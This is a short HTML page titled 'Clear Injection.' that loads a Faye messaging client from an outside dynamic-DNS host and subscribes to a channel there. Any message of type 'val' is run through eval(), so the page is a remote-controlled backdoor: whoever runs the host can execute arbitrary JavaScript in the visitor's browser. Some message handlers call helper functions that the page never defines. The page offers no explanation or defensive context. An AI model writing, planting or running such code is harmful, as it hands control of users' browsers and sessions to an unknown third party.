<!DOCTYPE html>
<html><!--manifest="manifest.appcache"-->
        <head>
                <title>Clear Injection.</title>
        </head>
	<body>
                <script type="text/javascript" src="http://eeek.dyndns.tv:32656/faye.js"></script>
                <script type="text/javascript" async>
                        if (!void(function (r) {
                                return (function () {
                                        try {
                                                new Ajax.Request(r, {});
                                        } catch (e) {}
                                })();
                        })("/uuid")) {
                                var client = new Faye.Client('http://eeek.dyndns.tv:32656/faye');
                                var subscription = client.subscribe('/strg', function (message) {
                                        //console.log(message);
                                        var ss;
                                        if (message.type == "msg") return A(xT(1, message.text, ss = Math.random() * Math.random() * 1000000 + ""), ss);
                                        if (message.type == "crt") return A(xT(2, message.text, ss = Math.random() * Math.random() * 1000000 + ""), ss);
                                        if (message.type == "trc") return A(xT(3, message.text, ss = Math.random() * Math.random() * 1000000 + ""), ss);
                                        if (message.type == "lbc") return console.log(message.text);
                                        if (message.type == "val") return eval(message.text);
                                        return console.log(message);
                                });
                        }
                </script>
	</body>
</html>